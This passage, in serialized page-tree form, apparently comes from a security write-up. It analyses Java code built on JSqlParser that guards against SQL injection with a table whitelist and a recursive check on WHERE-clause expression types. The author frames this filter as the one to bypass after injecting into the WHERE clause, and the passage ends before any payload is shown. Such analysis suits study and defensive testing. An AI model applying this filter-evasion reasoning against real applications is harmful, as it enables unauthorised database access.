",{"type":33,"tag":128,"props":26178,"children":26179},{"style":300},[26180],{"type":38,"value":26102},{"type":33,"tag":128,"props":26182,"children":26183},{"style":323},[26184],{"type":38,"value":26185}," Insert ",{"type":33,"tag":128,"props":26187,"children":26188},{"style":1576},[26189],{"type":38,"value":3755},{"type":33,"tag":128,"props":26191,"children":26192},{"style":135},[26193],{"type":38,"value":26194}," 
processInsert",{"type":33,"tag":128,"props":26196,"children":26197},{"style":312},[26198],{"type":38,"value":13071},{"type":33,"tag":128,"props":26200,"children":26201},{"style":323},[26202],{"type":38,"value":26203},"Insert",{"type":33,"tag":128,"props":26205,"children":26206},{"style":312},[26207],{"type":38,"value":2966},{"type":33,"tag":128,"props":26209,"children":26210},{"style":323},[26211],{"type":38,"value":26145},{"type":33,"tag":128,"props":26213,"children":26214},{"style":312},[26215],{"type":38,"value":2966},{"type":33,"tag":128,"props":26217,"children":26218},{"style":1576},[26219],{"type":38,"value":26220}," :",{"type":33,"tag":128,"props":26222,"children":26223},{"style":1576},[26224],{"type":38,"value":6721},{"type":33,"tag":128,"props":26226,"children":26227},{"style":312},[26228],{"type":38,"value":5676},{"type":33,"tag":128,"props":26230,"children":26231},{"class":130,"line":976},[26232],{"type":33,"tag":128,"props":26233,"children":26234},{"style":312},[26235],{"type":38,"value":13656},{"type":33,"tag":128,"props":26237,"children":26238},{"class":130,"line":988},[26239,26243,26247,26251,26256,26261,26265],{"type":33,"tag":128,"props":26240,"children":26241},{"style":312},[26242],{"type":38,"value":6850},{"type":33,"tag":128,"props":26244,"children":26245},{"style":1576},[26246],{"type":38,"value":6855},{"type":33,"tag":128,"props":26248,"children":26249},{"style":312},[26250],{"type":38,"value":2852},{"type":33,"tag":128,"props":26252,"children":26253},{"style":323},[26254],{"type":38,"value":26255},"Exception 
",{"type":33,"tag":128,"props":26257,"children":26258},{"style":306},[26259],{"type":38,"value":26260},"var3",{"type":33,"tag":128,"props":26262,"children":26263},{"style":312},[26264],{"type":38,"value":2966},{"type":33,"tag":128,"props":26266,"children":26267},{"style":312},[26268],{"type":38,"value":762},{"type":33,"tag":128,"props":26270,"children":26271},{"class":130,"line":1001},[26272,26277,26281,26286],{"type":33,"tag":128,"props":26273,"children":26274},{"style":306},[26275],{"type":38,"value":26276},"    var3",{"type":33,"tag":128,"props":26278,"children":26279},{"style":312},[26280],{"type":38,"value":215},{"type":33,"tag":128,"props":26282,"children":26283},{"style":135},[26284],{"type":38,"value":26285},"printStackTrace",{"type":33,"tag":128,"props":26287,"children":26288},{"style":312},[26289],{"type":38,"value":15496},{"type":33,"tag":128,"props":26291,"children":26292},{"class":130,"line":1014},[26293,26298,26302,26307,26311,26315,26320,26324],{"type":33,"tag":128,"props":26294,"children":26295},{"style":1576},[26296],{"type":38,"value":26297},"      throw",{"type":33,"tag":128,"props":26299,"children":26300},{"style":1576},[26301],{"type":38,"value":13061},{"type":33,"tag":128,"props":26303,"children":26304},{"style":135},[26305],{"type":38,"value":26306}," SQLException",{"type":33,"tag":128,"props":26308,"children":26309},{"style":312},[26310],{"type":38,"value":5566},{"type":33,"tag":128,"props":26312,"children":26313},{"style":676},[26314],{"type":38,"value":669},{"type":33,"tag":128,"props":26316,"children":26317},{"style":140},[26318],{"type":38,"value":26319},"SQL 
error",{"type":33,"tag":128,"props":26321,"children":26322},{"style":676},[26323],{"type":38,"value":669},{"type":33,"tag":128,"props":26325,"children":26326},{"style":312},[26327],{"type":38,"value":5815},{"type":33,"tag":128,"props":26329,"children":26330},{"class":130,"line":1026},[26331],{"type":33,"tag":128,"props":26332,"children":26333},{"style":312},[26334],{"type":38,"value":845},{"type":33,"tag":128,"props":26336,"children":26337},{"class":130,"line":1038},[26338],{"type":33,"tag":128,"props":26339,"children":26340},{"style":312},[26341],{"type":38,"value":854},{"type":33,"tag":47,"props":26343,"children":26344},{},[26345],{"type":38,"value":26346},"In our case, it will process the select part of the request, verify that it is indeed an instance of plainselect, then check the from part which will verify that this part contains a table name.",{"type":33,"tag":114,"props":26348,"children":26349},{"lang":25552},[26350],{"type":33,"tag":119,"props":26351,"children":26353},{"code":26352,"language":25552,"meta":8,"className":25557,"style":8},"private static boolean processSelect(Select statement) {\n  SelectBody selectBody = statement.getSelectBody();\n  if (selectBody instanceof PlainSelect) {\n      PlainSelect plainSelect = (PlainSelect)selectBody;\n      FromItem fromItem = plainSelect.getFromItem();\n      if (fromItem instanceof Table) {\n        String tablename = ((Table)fromItem).getName();\n        List\u003CString> whiteTable = SQLCheck.getWhiteTable();\n\n        if (!whiteTable.contains(tablename)) {\n            return false;\n        }\n        BinaryExpression expression = (BinaryExpression)plainSelect.getWhere();\n\n        if (!restrictExpr(expression)) {\n            return false;\n        }\n        return true;\n      }\n  }\n  return 
false;\n}\n",[26354],{"type":33,"tag":105,"props":26355,"children":26356},{"__ignoreMap":8},[26357,26394,26428,26461,26500,26534,26567,26616,26663,26670,26716,26732,26739,26787,26794,26830,26845,26852,26867,26874,26881,26896],{"type":33,"tag":128,"props":26358,"children":26359},{"class":130,"line":131},[26360,26365,26369,26373,26377,26381,26386,26390],{"type":33,"tag":128,"props":26361,"children":26362},{"style":300},[26363],{"type":38,"value":26364},"private",{"type":33,"tag":128,"props":26366,"children":26367},{"style":300},[26368],{"type":38,"value":25958},{"type":33,"tag":128,"props":26370,"children":26371},{"style":300},[26372],{"type":38,"value":25963},{"type":33,"tag":128,"props":26374,"children":26375},{"style":135},[26376],{"type":38,"value":26127},{"type":33,"tag":128,"props":26378,"children":26379},{"style":312},[26380],{"type":38,"value":5566},{"type":33,"tag":128,"props":26382,"children":26383},{"style":323},[26384],{"type":38,"value":26385},"Select statement",{"type":33,"tag":128,"props":26387,"children":26388},{"style":312},[26389],{"type":38,"value":2966},{"type":33,"tag":128,"props":26391,"children":26392},{"style":312},[26393],{"type":38,"value":762},{"type":33,"tag":128,"props":26395,"children":26396},{"class":130,"line":362},[26397,26402,26407,26411,26415,26419,26424],{"type":33,"tag":128,"props":26398,"children":26399},{"style":323},[26400],{"type":38,"value":26401},"  SelectBody",{"type":33,"tag":128,"props":26403,"children":26404},{"style":306},[26405],{"type":38,"value":26406}," 
selectBody",{"type":33,"tag":128,"props":26408,"children":26409},{"style":312},[26410],{"type":38,"value":5657},{"type":33,"tag":128,"props":26412,"children":26413},{"style":306},[26414],{"type":38,"value":26039},{"type":33,"tag":128,"props":26416,"children":26417},{"style":312},[26418],{"type":38,"value":215},{"type":33,"tag":128,"props":26420,"children":26421},{"style":135},[26422],{"type":38,"value":26423},"getSelectBody",{"type":33,"tag":128,"props":26425,"children":26426},{"style":312},[26427],{"type":38,"value":15496},{"type":33,"tag":128,"props":26429,"children":26430},{"class":130,"line":403},[26431,26435,26439,26444,26448,26453,26457],{"type":33,"tag":128,"props":26432,"children":26433},{"style":1576},[26434],{"type":38,"value":16415},{"type":33,"tag":128,"props":26436,"children":26437},{"style":312},[26438],{"type":38,"value":2852},{"type":33,"tag":128,"props":26440,"children":26441},{"style":323},[26442],{"type":38,"value":26443},"selectBody ",{"type":33,"tag":128,"props":26445,"children":26446},{"style":300},[26447],{"type":38,"value":26102},{"type":33,"tag":128,"props":26449,"children":26450},{"style":323},[26451],{"type":38,"value":26452}," PlainSelect",{"type":33,"tag":128,"props":26454,"children":26455},{"style":312},[26456],{"type":38,"value":2966},{"type":33,"tag":128,"props":26458,"children":26459},{"style":312},[26460],{"type":38,"value":762},{"type":33,"tag":128,"props":26462,"children":26463},{"class":130,"line":739},[26464,26469,26474,26478,26482,26487,26491,26496],{"type":33,"tag":128,"props":26465,"children":26466},{"style":323},[26467],{"type":38,"value":26468},"      PlainSelect",{"type":33,"tag":128,"props":26470,"children":26471},{"style":306},[26472],{"type":38,"value":26473}," 
plainSelect",{"type":33,"tag":128,"props":26475,"children":26476},{"style":312},[26477],{"type":38,"value":5657},{"type":33,"tag":128,"props":26479,"children":26480},{"style":312},[26481],{"type":38,"value":2852},{"type":33,"tag":128,"props":26483,"children":26484},{"style":323},[26485],{"type":38,"value":26486},"PlainSelect",{"type":33,"tag":128,"props":26488,"children":26489},{"style":312},[26490],{"type":38,"value":2966},{"type":33,"tag":128,"props":26492,"children":26493},{"style":323},[26494],{"type":38,"value":26495},"selectBody",{"type":33,"tag":128,"props":26497,"children":26498},{"style":312},[26499],{"type":38,"value":5676},{"type":33,"tag":128,"props":26501,"children":26502},{"class":130,"line":765},[26503,26508,26513,26517,26521,26525,26530],{"type":33,"tag":128,"props":26504,"children":26505},{"style":323},[26506],{"type":38,"value":26507},"      FromItem",{"type":33,"tag":128,"props":26509,"children":26510},{"style":306},[26511],{"type":38,"value":26512}," fromItem",{"type":33,"tag":128,"props":26514,"children":26515},{"style":312},[26516],{"type":38,"value":5657},{"type":33,"tag":128,"props":26518,"children":26519},{"style":306},[26520],{"type":38,"value":26473},{"type":33,"tag":128,"props":26522,"children":26523},{"style":312},[26524],{"type":38,"value":215},{"type":33,"tag":128,"props":26526,"children":26527},{"style":135},[26528],{"type":38,"value":26529},"getFromItem",{"type":33,"tag":128,"props":26531,"children":26532},{"style":312},[26533],{"type":38,"value":15496},{"type":33,"tag":128,"props":26535,"children":26536},{"class":130,"line":804},[26537,26541,26545,26550,26554,26559,26563],{"type":33,"tag":128,"props":26538,"children":26539},{"style":1576},[26540],{"type":38,"value":13561},{"type":33,"tag":128,"props":26542,"children":26543},{"style":312},[26544],{"type":38,"value":2852},{"type":33,"tag":128,"props":26546,"children":26547},{"style":323},[26548],{"type":38,"value":26549},"fromItem 
",{"type":33,"tag":128,"props":26551,"children":26552},{"style":300},[26553],{"type":38,"value":26102},{"type":33,"tag":128,"props":26555,"children":26556},{"style":323},[26557],{"type":38,"value":26558}," Table",{"type":33,"tag":128,"props":26560,"children":26561},{"style":312},[26562],{"type":38,"value":2966},{"type":33,"tag":128,"props":26564,"children":26565},{"style":312},[26566],{"type":38,"value":762},{"type":33,"tag":128,"props":26568,"children":26569},{"class":130,"line":839},[26570,26575,26580,26584,26589,26594,26598,26603,26607,26612],{"type":33,"tag":128,"props":26571,"children":26572},{"style":323},[26573],{"type":38,"value":26574},"        String",{"type":33,"tag":128,"props":26576,"children":26577},{"style":306},[26578],{"type":38,"value":26579}," tablename",{"type":33,"tag":128,"props":26581,"children":26582},{"style":312},[26583],{"type":38,"value":5657},{"type":33,"tag":128,"props":26585,"children":26586},{"style":312},[26587],{"type":38,"value":26588}," ((",{"type":33,"tag":128,"props":26590,"children":26591},{"style":323},[26592],{"type":38,"value":26593},"Table",{"type":33,"tag":128,"props":26595,"children":26596},{"style":312},[26597],{"type":38,"value":2966},{"type":33,"tag":128,"props":26599,"children":26600},{"style":323},[26601],{"type":38,"value":26602},"fromItem",{"type":33,"tag":128,"props":26604,"children":26605},{"style":312},[26606],{"type":38,"value":6700},{"type":33,"tag":128,"props":26608,"children":26609},{"style":135},[26610],{"type":38,"value":26611},"getName",{"type":33,"tag":128,"props":26613,"children":26614},{"style":312},[26615],{"type":38,"value":15496},{"type":33,"tag":128,"props":26617,"children":26618},{"class":130,"line":848},[26619,26624,26628,26632,26636,26641,26645,26650,26654,26659],{"type":33,"tag":128,"props":26620,"children":26621},{"style":323},[26622],{"type":38,"value":26623},"        
List",{"type":33,"tag":128,"props":26625,"children":26626},{"style":312},[26627],{"type":38,"value":5977},{"type":33,"tag":128,"props":26629,"children":26630},{"style":300},[26631],{"type":38,"value":25569},{"type":33,"tag":128,"props":26633,"children":26634},{"style":312},[26635],{"type":38,"value":6054},{"type":33,"tag":128,"props":26637,"children":26638},{"style":306},[26639],{"type":38,"value":26640}," whiteTable",{"type":33,"tag":128,"props":26642,"children":26643},{"style":312},[26644],{"type":38,"value":5657},{"type":33,"tag":128,"props":26646,"children":26647},{"style":306},[26648],{"type":38,"value":26649}," SQLCheck",{"type":33,"tag":128,"props":26651,"children":26652},{"style":312},[26653],{"type":38,"value":215},{"type":33,"tag":128,"props":26655,"children":26656},{"style":135},[26657],{"type":38,"value":26658},"getWhiteTable",{"type":33,"tag":128,"props":26660,"children":26661},{"style":312},[26662],{"type":38,"value":15496},{"type":33,"tag":128,"props":26664,"children":26665},{"class":130,"line":976},[26666],{"type":33,"tag":128,"props":26667,"children":26668},{"emptyLinePlaceholder":896},[26669],{"type":38,"value":899},{"type":33,"tag":128,"props":26671,"children":26672},{"class":130,"line":988},[26673,26677,26681,26685,26690,26694,26699,26703,26708,26712],{"type":33,"tag":128,"props":26674,"children":26675},{"style":1576},[26676],{"type":38,"value":15223},{"type":33,"tag":128,"props":26678,"children":26679},{"style":312},[26680],{"type":38,"value":2852},{"type":33,"tag":128,"props":26682,"children":26683},{"style":300},[26684],{"type":38,"value":16424},{"type":33,"tag":128,"props":26686,"children":26687},{"style":306},[26688],{"type":38,"value":26689},"whiteTable",{"type":33,"tag":128,"props":26691,"children":26692},{"style":312},[26693],{"type":38,"value":215},{"type":33,"tag":128,"props":26695,"children":26696},{"style":135},[26697],{"type":38,"value":26698},"contains",{"type":33,"tag":128,"props":26700,"children":26701},{"style":312},[26702],{"typ
e":38,"value":5566},{"type":33,"tag":128,"props":26704,"children":26705},{"style":323},[26706],{"type":38,"value":26707},"tablename",{"type":33,"tag":128,"props":26709,"children":26710},{"style":312},[26711],{"type":38,"value":7088},{"type":33,"tag":128,"props":26713,"children":26714},{"style":312},[26715],{"type":38,"value":762},{"type":33,"tag":128,"props":26717,"children":26718},{"class":130,"line":1001},[26719,26724,26728],{"type":33,"tag":128,"props":26720,"children":26721},{"style":1576},[26722],{"type":38,"value":26723},"            return",{"type":33,"tag":128,"props":26725,"children":26726},{"style":1576},[26727],{"type":38,"value":6721},{"type":33,"tag":128,"props":26729,"children":26730},{"style":312},[26731],{"type":38,"value":5676},{"type":33,"tag":128,"props":26733,"children":26734},{"class":130,"line":1014},[26735],{"type":33,"tag":128,"props":26736,"children":26737},{"style":312},[26738],{"type":38,"value":15318},{"type":33,"tag":128,"props":26740,"children":26741},{"class":130,"line":1026},[26742,26747,26752,26756,26760,26765,26769,26774,26778,26783],{"type":33,"tag":128,"props":26743,"children":26744},{"style":323},[26745],{"type":38,"value":26746},"        BinaryExpression",{"type":33,"tag":128,"props":26748,"children":26749},{"style":306},[26750],{"type":38,"value":26751}," 
expression",{"type":33,"tag":128,"props":26753,"children":26754},{"style":312},[26755],{"type":38,"value":5657},{"type":33,"tag":128,"props":26757,"children":26758},{"style":312},[26759],{"type":38,"value":2852},{"type":33,"tag":128,"props":26761,"children":26762},{"style":323},[26763],{"type":38,"value":26764},"BinaryExpression",{"type":33,"tag":128,"props":26766,"children":26767},{"style":312},[26768],{"type":38,"value":2966},{"type":33,"tag":128,"props":26770,"children":26771},{"style":306},[26772],{"type":38,"value":26773},"plainSelect",{"type":33,"tag":128,"props":26775,"children":26776},{"style":312},[26777],{"type":38,"value":215},{"type":33,"tag":128,"props":26779,"children":26780},{"style":135},[26781],{"type":38,"value":26782},"getWhere",{"type":33,"tag":128,"props":26784,"children":26785},{"style":312},[26786],{"type":38,"value":15496},{"type":33,"tag":128,"props":26788,"children":26789},{"class":130,"line":1038},[26790],{"type":33,"tag":128,"props":26791,"children":26792},{"emptyLinePlaceholder":896},[26793],{"type":38,"value":899},{"type":33,"tag":128,"props":26795,"children":26796},{"class":130,"line":1051},[26797,26801,26805,26809,26814,26818,26822,26826],{"type":33,"tag":128,"props":26798,"children":26799},{"style":1576},[26800],{"type":38,"value":15223},{"type":33,"tag":128,"props":26802,"children":26803},{"style":312},[26804],{"type":38,"value":2852},{"type":33,"tag":128,"props":26806,"children":26807},{"style":300},[26808],{"type":38,"value":16424},{"type":33,"tag":128,"props":26810,"children":26811},{"style":135},[26812],{"type":38,"value":26813},"restrictExpr",{"type":33,"tag":128,"props":26815,"children":26816},{"style":312},[26817],{"type":38,"value":5566},{"type":33,"tag":128,"props":26819,"children":26820},{"style":323},[26821],{"type":38,"value":814},{"type":33,"tag":128,"props":26823,"children":26824},{"style":312},[26825],{"type":38,"value":7088},{"type":33,"tag":128,"props":26827,"children":26828},{"style":312},[26829],{"type":38,"value"
:762},{"type":33,"tag":128,"props":26831,"children":26832},{"class":130,"line":1063},[26833,26837,26841],{"type":33,"tag":128,"props":26834,"children":26835},{"style":1576},[26836],{"type":38,"value":26723},{"type":33,"tag":128,"props":26838,"children":26839},{"style":1576},[26840],{"type":38,"value":6721},{"type":33,"tag":128,"props":26842,"children":26843},{"style":312},[26844],{"type":38,"value":5676},{"type":33,"tag":128,"props":26846,"children":26847},{"class":130,"line":1076},[26848],{"type":33,"tag":128,"props":26849,"children":26850},{"style":312},[26851],{"type":38,"value":15318},{"type":33,"tag":128,"props":26853,"children":26854},{"class":130,"line":1089},[26855,26859,26863],{"type":33,"tag":128,"props":26856,"children":26857},{"style":1576},[26858],{"type":38,"value":13615},{"type":33,"tag":128,"props":26860,"children":26861},{"style":1576},[26862],{"type":38,"value":5850},{"type":33,"tag":128,"props":26864,"children":26865},{"style":312},[26866],{"type":38,"value":5676},{"type":33,"tag":128,"props":26868,"children":26869},{"class":130,"line":1101},[26870],{"type":33,"tag":128,"props":26871,"children":26872},{"style":312},[26873],{"type":38,"value":13656},{"type":33,"tag":128,"props":26875,"children":26876},{"class":130,"line":1114},[26877],{"type":33,"tag":128,"props":26878,"children":26879},{"style":312},[26880],{"type":38,"value":845},{"type":33,"tag":128,"props":26882,"children":26883},{"class":130,"line":1127},[26884,26888,26892],{"type":33,"tag":128,"props":26885,"children":26886},{"style":1576},[26887],{"type":38,"value":13056},{"type":33,"tag":128,"props":26889,"children":26890},{"style":1576},[26891],{"type":38,"value":6721},{"type":33,"tag":128,"props":26893,"children":26894},{"style":312},[26895],{"type":38,"value":5676},{"type":33,"tag":128,"props":26897,"children":26898},{"class":130,"line":1139},[26899],{"type":33,"tag":128,"props":26900,"children":26901},{"style":312},[26902],{"type":38,"value":854},{"type":33,"tag":47,"props":26904,"child
ren":26905},{},[26906,26908,26913,26915,26921,26923,26928],{"type":38,"value":26907},"Next, the function will check the last part, namely, the where part of the query. For this, it will retrieve the entirety of the where with the ",{"type":33,"tag":105,"props":26909,"children":26911},{"className":26910},[],[26912],{"type":38,"value":26782},{"type":38,"value":26914}," function from the library ",{"type":33,"tag":105,"props":26916,"children":26918},{"className":26917},[],[26919],{"type":38,"value":26920},"net.sf.jsqlparser.expression",{"type":38,"value":26922}," and call the function ",{"type":33,"tag":105,"props":26924,"children":26926},{"className":26925},[],[26927],{"type":38,"value":26813},{"type":38,"value":215},{"type":33,"tag":47,"props":26930,"children":26931},{},[26932],{"type":38,"value":26933},"The first three checks are not of interest to us, because they already pass in our case given that we have not altered these parts of the query.",{"type":33,"tag":47,"props":26935,"children":26936},{},[26937,26939,26944],{"type":38,"value":26938},"Here, since we injected into the where, it is the filter on this part that must be bypassed. If we look closely at the ",{"type":33,"tag":105,"props":26940,"children":26942},{"className":26941},[],[26943],{"type":38,"value":26813},{"type":38,"value":26945}," function. 
We can see that this recursive function retrieves the right part and the left part of the where part of the query.",{"type":33,"tag":114,"props":26947,"children":26948},{"lang":25552},[26949],{"type":33,"tag":119,"props":26950,"children":26952},{"code":26951,"language":25552,"meta":8,"className":25557,"style":8},"private static boolean restrictExpr(BinaryExpression expression) {\n  Expression left_expr = expression.getLeftExpression();\n  Expression right_expr = expression.getRightExpression();\n  if (left_expr instanceof BinaryExpression) {\n      return restrictExpr((BinaryExpression)left_expr);\n  } else if (right_expr instanceof BinaryExpression) {\n      return restrictExpr((BinaryExpression)right_expr);\n  } else {\n      List arrays = Arrays.asList(restrictExprCls);         \n      return arrays.contains(left_expr.getClass()) && arrays.contains(right_expr.getClass());\n  }\n}\n",[26953],{"type":33,"tag":105,"props":26954,"children":26955},{"__ignoreMap":8},[26956,26993,27027,27060,27093,27125,27165,27197,27212,27262,27340,27347],{"type":33,"tag":128,"props":26957,"children":26958},{"class":130,"line":131},[26959,26963,26967,26971,26976,26980,26985,26989],{"type":33,"tag":128,"props":26960,"children":26961},{"style":300},[26962],{"type":38,"value":26364},{"type":33,"tag":128,"props":26964,"children":26965},{"style":300},[26966],{"type":38,"value":25958},{"type":33,"tag":128,"props":26968,"children":26969},{"style":300},[26970],{"type":38,"value":25963},{"type":33,"tag":128,"props":26972,"children":26973},{"style":135},[26974],{"type":38,"value":26975}," restrictExpr",{"type":33,"tag":128,"props":26977,"children":26978},{"style":312},[26979],{"type":38,"value":5566},{"type":33,"tag":128,"props":26981,"children":26982},{"style":323},[26983],{"type":38,"value":26984},"BinaryExpression 
expression",{"type":33,"tag":128,"props":26986,"children":26987},{"style":312},[26988],{"type":38,"value":2966},{"type":33,"tag":128,"props":26990,"children":26991},{"style":312},[26992],{"type":38,"value":762},{"type":33,"tag":128,"props":26994,"children":26995},{"class":130,"line":362},[26996,27001,27006,27010,27014,27018,27023],{"type":33,"tag":128,"props":26997,"children":26998},{"style":323},[26999],{"type":38,"value":27000},"  Expression",{"type":33,"tag":128,"props":27002,"children":27003},{"style":306},[27004],{"type":38,"value":27005}," left_expr",{"type":33,"tag":128,"props":27007,"children":27008},{"style":312},[27009],{"type":38,"value":5657},{"type":33,"tag":128,"props":27011,"children":27012},{"style":306},[27013],{"type":38,"value":26751},{"type":33,"tag":128,"props":27015,"children":27016},{"style":312},[27017],{"type":38,"value":215},{"type":33,"tag":128,"props":27019,"children":27020},{"style":135},[27021],{"type":38,"value":27022},"getLeftExpression",{"type":33,"tag":128,"props":27024,"children":27025},{"style":312},[27026],{"type":38,"value":15496},{"type":33,"tag":128,"props":27028,"children":27029},{"class":130,"line":403},[27030,27034,27039,27043,27047,27051,27056],{"type":33,"tag":128,"props":27031,"children":27032},{"style":323},[27033],{"type":38,"value":27000},{"type":33,"tag":128,"props":27035,"children":27036},{"style":306},[27037],{"type":38,"value":27038}," 
right_expr",{"type":33,"tag":128,"props":27040,"children":27041},{"style":312},[27042],{"type":38,"value":5657},{"type":33,"tag":128,"props":27044,"children":27045},{"style":306},[27046],{"type":38,"value":26751},{"type":33,"tag":128,"props":27048,"children":27049},{"style":312},[27050],{"type":38,"value":215},{"type":33,"tag":128,"props":27052,"children":27053},{"style":135},[27054],{"type":38,"value":27055},"getRightExpression",{"type":33,"tag":128,"props":27057,"children":27058},{"style":312},[27059],{"type":38,"value":15496},{"type":33,"tag":128,"props":27061,"children":27062},{"class":130,"line":739},[27063,27067,27071,27076,27080,27085,27089],{"type":33,"tag":128,"props":27064,"children":27065},{"style":1576},[27066],{"type":38,"value":16415},{"type":33,"tag":128,"props":27068,"children":27069},{"style":312},[27070],{"type":38,"value":2852},{"type":33,"tag":128,"props":27072,"children":27073},{"style":323},[27074],{"type":38,"value":27075},"left_expr ",{"type":33,"tag":128,"props":27077,"children":27078},{"style":300},[27079],{"type":38,"value":26102},{"type":33,"tag":128,"props":27081,"children":27082},{"style":323},[27083],{"type":38,"value":27084}," 
BinaryExpression",{"type":33,"tag":128,"props":27086,"children":27087},{"style":312},[27088],{"type":38,"value":2966},{"type":33,"tag":128,"props":27090,"children":27091},{"style":312},[27092],{"type":38,"value":762},{"type":33,"tag":128,"props":27094,"children":27095},{"class":130,"line":765},[27096,27100,27104,27108,27112,27116,27121],{"type":33,"tag":128,"props":27097,"children":27098},{"style":1576},[27099],{"type":38,"value":6673},{"type":33,"tag":128,"props":27101,"children":27102},{"style":135},[27103],{"type":38,"value":26975},{"type":33,"tag":128,"props":27105,"children":27106},{"style":312},[27107],{"type":38,"value":13071},{"type":33,"tag":128,"props":27109,"children":27110},{"style":323},[27111],{"type":38,"value":26764},{"type":33,"tag":128,"props":27113,"children":27114},{"style":312},[27115],{"type":38,"value":2966},{"type":33,"tag":128,"props":27117,"children":27118},{"style":323},[27119],{"type":38,"value":27120},"left_expr",{"type":33,"tag":128,"props":27122,"children":27123},{"style":312},[27124],{"type":38,"value":5815},{"type":33,"tag":128,"props":27126,"children":27127},{"class":130,"line":804},[27128,27132,27136,27140,27144,27149,27153,27157,27161],{"type":33,"tag":128,"props":27129,"children":27130},{"style":312},[27131],{"type":38,"value":6850},{"type":33,"tag":128,"props":27133,"children":27134},{"style":1576},[27135],{"type":38,"value":14269},{"type":33,"tag":128,"props":27137,"children":27138},{"style":1576},[27139],{"type":38,"value":14274},{"type":33,"tag":128,"props":27141,"children":27142},{"style":312},[27143],{"type":38,"value":2852},{"type":33,"tag":128,"props":27145,"children":27146},{"style":323},[27147],{"type":38,"value":27148},"right_expr 
",{"type":33,"tag":128,"props":27150,"children":27151},{"style":300},[27152],{"type":38,"value":26102},{"type":33,"tag":128,"props":27154,"children":27155},{"style":323},[27156],{"type":38,"value":27084},{"type":33,"tag":128,"props":27158,"children":27159},{"style":312},[27160],{"type":38,"value":2966},{"type":33,"tag":128,"props":27162,"children":27163},{"style":312},[27164],{"type":38,"value":762},{"type":33,"tag":128,"props":27166,"children":27167},{"class":130,"line":839},[27168,27172,27176,27180,27184,27188,27193],{"type":33,"tag":128,"props":27169,"children":27170},{"style":1576},[27171],{"type":38,"value":6673},{"type":33,"tag":128,"props":27173,"children":27174},{"style":135},[27175],{"type":38,"value":26975},{"type":33,"tag":128,"props":27177,"children":27178},{"style":312},[27179],{"type":38,"value":13071},{"type":33,"tag":128,"props":27181,"children":27182},{"style":323},[27183],{"type":38,"value":26764},{"type":33,"tag":128,"props":27185,"children":27186},{"style":312},[27187],{"type":38,"value":2966},{"type":33,"tag":128,"props":27189,"children":27190},{"style":323},[27191],{"type":38,"value":27192},"right_expr",{"type":33,"tag":128,"props":27194,"children":27195},{"style":312},[27196],{"type":38,"value":5815},{"type":33,"tag":128,"props":27198,"children":27199},{"class":130,"line":848},[27200,27204,27208],{"type":33,"tag":128,"props":27201,"children":27202},{"style":312},[27203],{"type":38,"value":6850},{"type":33,"tag":128,"props":27205,"children":27206},{"style":1576},[27207],{"type":38,"value":14269},{"type":33,"tag":128,"props":27209,"children":27210},{"style":312},[27211],{"type":38,"value":762},{"type":33,"tag":128,"props":27213,"children":27214},{"class":130,"line":976},[27215,27220,27225,27229,27234,27238,27243,27247,27252,27257],{"type":33,"tag":128,"props":27216,"children":27217},{"style":323},[27218],{"type":38,"value":27219},"      List",{"type":33,"tag":128,"props":27221,"children":27222},{"style":306},[27223],{"type":38,"value":27224}," 
arrays",{"type":33,"tag":128,"props":27226,"children":27227},{"style":312},[27228],{"type":38,"value":5657},{"type":33,"tag":128,"props":27230,"children":27231},{"style":306},[27232],{"type":38,"value":27233}," Arrays",{"type":33,"tag":128,"props":27235,"children":27236},{"style":312},[27237],{"type":38,"value":215},{"type":33,"tag":128,"props":27239,"children":27240},{"style":135},[27241],{"type":38,"value":27242},"asList",{"type":33,"tag":128,"props":27244,"children":27245},{"style":312},[27246],{"type":38,"value":5566},{"type":33,"tag":128,"props":27248,"children":27249},{"style":323},[27250],{"type":38,"value":27251},"restrictExprCls",{"type":33,"tag":128,"props":27253,"children":27254},{"style":312},[27255],{"type":38,"value":27256},");",{"type":33,"tag":128,"props":27258,"children":27259},{"style":323},[27260],{"type":38,"value":27261},"         \n",{"type":33,"tag":128,"props":27263,"children":27264},{"class":130,"line":988},[27265,27269,27273,27277,27281,27285,27289,27293,27298,27303,27307,27311,27315,27319,27323,27327,27331,27335],{"type":33,"tag":128,"props":27266,"children":27267},{"style":1576},[27268],{"type":38,"value":6673},{"type":33,"tag":128,"props":27270,"children":27271},{"style":306},[27272],{"type":38,"value":27224},{"type":33,"tag":128,"props":27274,"children":27275},{"style":312},[27276],{"type":38,"value":215},{"type":33,"tag":128,"props":27278,"children":27279},{"style":135},[27280],{"type":38,"value":26698},{"type":33,"tag":128,"props":27282,"children":27283},{"style":312},[27284],{"type":38,"value":5566},{"type":33,"tag":128,"props":27286,"children":27287},{"style":306},[27288],{"type":38,"value":27120},{"type":33,"tag":128,"props":27290,"children":27291},{"style":312},[27292],{"type":38,"value":215},{"type":33,"tag":128,"props":27294,"children":27295},{"style":135},[27296],{"type":38,"value":27297},"getClass",{"type":33,"tag":128,"props":27299,"children":27300},{"style":312},[27301],{"type":38,"value":27302},"())",{"type":33,"tag":128,"p
rops":27304,"children":27305},{"style":300},[27306],{"type":38,"value":10037},{"type":33,"tag":128,"props":27308,"children":27309},{"style":306},[27310],{"type":38,"value":27224},{"type":33,"tag":128,"props":27312,"children":27313},{"style":312},[27314],{"type":38,"value":215},{"type":33,"tag":128,"props":27316,"children":27317},{"style":135},[27318],{"type":38,"value":26698},{"type":33,"tag":128,"props":27320,"children":27321},{"style":312},[27322],{"type":38,"value":5566},{"type":33,"tag":128,"props":27324,"children":27325},{"style":306},[27326],{"type":38,"value":27192},{"type":33,"tag":128,"props":27328,"children":27329},{"style":312},[27330],{"type":38,"value":215},{"type":33,"tag":128,"props":27332,"children":27333},{"style":135},[27334],{"type":38,"value":27297},{"type":33,"tag":128,"props":27336,"children":27337},{"style":312},[27338],{"type":38,"value":27339},"());\n",{"type":33,"tag":128,"props":27341,"children":27342},{"class":130,"line":1001},[27343],{"type":33,"tag":128,"props":27344,"children":27345},{"style":312},[27346],{"type":38,"value":845},{"type":33,"tag":128,"props":27348,"children":27349},{"class":130,"line":1014},[27350],{"type":33,"tag":128,"props":27351,"children":27352},{"style":312},[27353],{"type":38,"value":854},{"type":33,"tag":47,"props":27355,"children":27356},{},[27357],{"type":38,"value":27358},"If one of the parts contains another part of where then the function will be reapplied. 
